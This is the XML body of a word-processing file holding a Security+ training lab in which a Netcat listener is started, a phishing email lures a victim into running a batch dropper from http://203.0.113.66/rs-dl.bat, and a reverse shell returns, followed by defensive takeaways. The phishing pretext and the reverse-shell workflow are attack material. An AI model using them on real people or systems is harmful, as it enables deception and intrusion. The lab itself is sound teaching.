      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="8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nc -l -k -p 7890</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top w:val="none"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1A365D"/>
              <w:bottom w:val="none"/>
              <w:right w:val="none"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1A365D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Parameter Breakdown: nc -l -k -p 7890</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>• -l: Sets Netcat to listen mode for incoming connections.</w:t>
              <w:br/>
              <w:t>• -k: Keeps the listener open and active across multiple sequential connections (persistent listening).</w:t>
              <w:br/>
              <w:t>• -p 7890: Binds the listener to TCP port 7890.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4. Phase 2: Social Engineering &amp; Victim Compromise (MS10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>In this phase, you transition to the simulated victim's environment, observe the phishing pretext, and execute the dropper file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Social Engineering Pretext Context</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The simulated attacker sends an email targeting jaime@structureality.com with an IT maintenance pretext designed to bypass user skepticism:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="FFF5F5"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="C53030"/>
              <w:bottom w:val="none"/>
              <w:right w:val="none"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1A365D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phishing Communication Artifact</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>To: jaime@structureality.com</w:t>
              <w:br/>
              <w:t>From: 515Support &lt;support@515support.com&gt;</w:t>
              <w:br/>
              <w:t>Subject: Urgent: Configuration Update Required Due to Equipment Changes</w:t>
              <w:br/>
              <w:br/>
              <w:t>Dear 515Support customer,</w:t>
              <w:br/>
              <w:br/>
              <w:t>Due to recent equipment changes, there is a need to alter the configuration of your systems to provide you with optimal service. Please follow the link below to access an auto-configuration script that will download and apply the necessary changes to your system.</w:t>
              <w:br/>
              <w:br/>
              <w:t>http://203.0.113.66/rs-dl.bat</w:t>
              <w:br/>
              <w:br/>
              <w:t>Once you have downloaded this file, execute it. Your system may warn you that this is an unknown program. Don't worry about that. Just agree to allow it to run anyway. Our in-house security team wrote this tool, thus it is safe to run.</w:t>
              <w:br/>
              <w:br/>
              <w:t>Note: The update operation may take a few minutes to complete. Minimize the Command Prompt window and continue using your system normally.</w:t>
              <w:br/>
              <w:br/>
              <w:t>Sincerely,</w:t>
              <w:br/>
              <w:t>515Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 8: Authenticate on Victim Machine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Connect to the MS10 VM, send Ctrl+Alt+Delete, and sign in with the following credentials:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">• Username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Jaime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">• Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Pa$$w0rd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 9: Dismiss System Management Prompts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Minimize or close Server Manager if it opens automatically upon login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 10: Launch Browser &amp; Retrieve Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Open Firefox via the desktop shortcut. In the URL address bar, enter the link from the phishing email:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="8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http://203.0.113.66/rs-dl.bat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 11: Execute the Malicious Script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>In the Firefox Downloads window, locate rs-dl.bat and click to open it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>When prompted with the file download dialog, select OK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>When the Windows Open File - Security Warning prompt appears warning about an unknown publisher, select Run.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>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top w:val="none"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1A365D"/>
              <w:bottom w:val="none"/>
              <w:right w:val="none"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1A365D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Lab Checkpoint: Victim Payload Execution</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Select the Score button in the lab interface to validate:</w:t>
              <w:br/>
              <w:t>Active nc.exe connection detected ... Task complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5. Phase 3: Post-Exploitation &amp; Network Analysis (KALI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>In this phase, you return to the Kali listener terminal to verify interactive command shell access and review the egress network mechanics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 12: Return to Listener Terminal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Switch back to the KALI VM (re-authenticate as root / Pa$$w0rd if the session locked). Return to the running Terminal window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 13: Establish Shell Connection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Wait approximately 10–15 seconds for the victim's batch script to complete download and execution. The listener terminal will pop with a remote Windows command prompt:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="8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Microsoft Windows [Version 10.0.14393]</w:t>
              <w:br/>
              <w:t>(c) 2016 Microsoft Corporation. All rights reserved.</w:t>
              <w:br/>
              <w:br/>
              <w:t>C:\Users\jaime\Downloads&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 14: Conduct System Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Execute reconnaissance commands within the reverse shell session to verify system context and privilege level:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="8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hostname</w:t>
              <w:br/>
              <w:t>whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Output: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• hostname returns the system name (MS10).</w:t>
        <w:br/>
        <w:t>• whoami displays the active account context (structureality\jaime).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 15: Terminate Session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Close the reverse shell session and release the terminal listener:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E0"/>
              <w:left w:val="single" w:sz="16" w:space="0" w:color="4A5568"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>6. Security Takeaways &amp; CompTIA Security+ Exam Relevance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Core Concepts &amp; Attack Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. Pretexting &amp; Friction Reduction: Attackers construct convincing narratives (e.g., IT equipment upgrade) and proactively address friction points (instructing victims to dismiss security warning dialogs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Firewall Egress vs. Ingress Filtering: Most perimeter firewalls block inbound connection attempts from untrusted external IPs. However, reverse shells bypass ingress rules by forcing the internal victim host to initiate an outbound (egress) connection back to the attacker over common or unmonitored ports (e.g., TCP 7890, 80, 443).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Execution Vector: The batch script acts as a secondary stage dropper, downloading binaries directly into the victim's local user directory (C:\Users\jaime\Downloads) without requiring administrative elevation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Defensive &amp; Awareness Countermeasures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Technical Controls: Implement strict outbound egress filtering, endpoint Application Control / AppLocker (blocking execution of unsigned scripts and unapproved binaries from download folders), and DNS filtering to block malicious IP domains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>• Administrative / Awareness Controls: Train users never to ignore or override operating system security warnings, and mandate out-of-band verification (e.g., calling the helpdesk) for unannounced update scripts.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